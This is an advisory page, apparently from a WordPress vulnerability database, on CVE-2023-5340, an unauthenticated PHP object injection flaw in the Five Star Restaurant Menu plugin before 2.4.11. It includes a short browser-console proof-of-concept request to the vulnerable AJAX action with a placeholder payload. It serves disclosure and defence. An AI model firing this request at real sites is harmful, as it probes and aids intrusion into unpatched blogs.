Five Star Restaurant Menu and Food Ordering < 2.4.11 – Unauthenticated PHP Object Injection | CVE 2023-5340 | Plugin Vulnerabilities

Description

The plugin unserializes user input via an AJAX action available to unauthenticated users, allowing them to perform PHP Object Injection when a suitable gadget is present on the blog.

Proof of Concept

Run the below command in the developer console of the web browser while being on the blog unauthenticated

fetch("/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded"
  },
  "body": new URLSearchParams({"action": "fdm_update_cart_item", "options": "data-to-unserialize"}),
  "method": "POST",
  "credentials": "include"
});

Affects Plugins

food-and-drink-menu

Fixed in 2.4.11

References

CVE

Classification

Type

OBJECT INJECTION

OWASP top 10

A8: Insecure Deserialization

CWE

CVSS

Miscellaneous

Original Researcher

Krzysztof Zając (CERT PL)

Submitter

Krzysztof Zając (CERT PL)

Submitter website

https://cert.pl

Submitter twitter

Verified

Yes

WPVDB ID

91a5847a-62e7-4b98-a554-5eecb6a06e5b

Timeline

Publicly Published

2023-10-27 (about 6 months ago)

Added

2023-10-27 (about 6 months ago)

Last Updated

2023-10-27 (about 6 months ago)

Other

Published

Title

Published

2024-04-29

Title

Event Monster <= 1.3.6 - Contributor+ PHP Object Injection via Custom Meta

Published

2022-10-03

Title

Kadence WooCommerce Email Designer < 1.5.7 - Admin+ PHP Objection Injection

Published

2024-04-10

Title

WordPress Geo Controller < 8.6.5 - PHP Object Injection

Published

2023-04-19

Title

Ad Inserter < 2.7.27 - Admin+ PHP Object Injection

Published

2024-01-05

Title

Gecka Terms Thumbnails <= 1.1 - Authenticated (Subscriber+) PHP Object Injection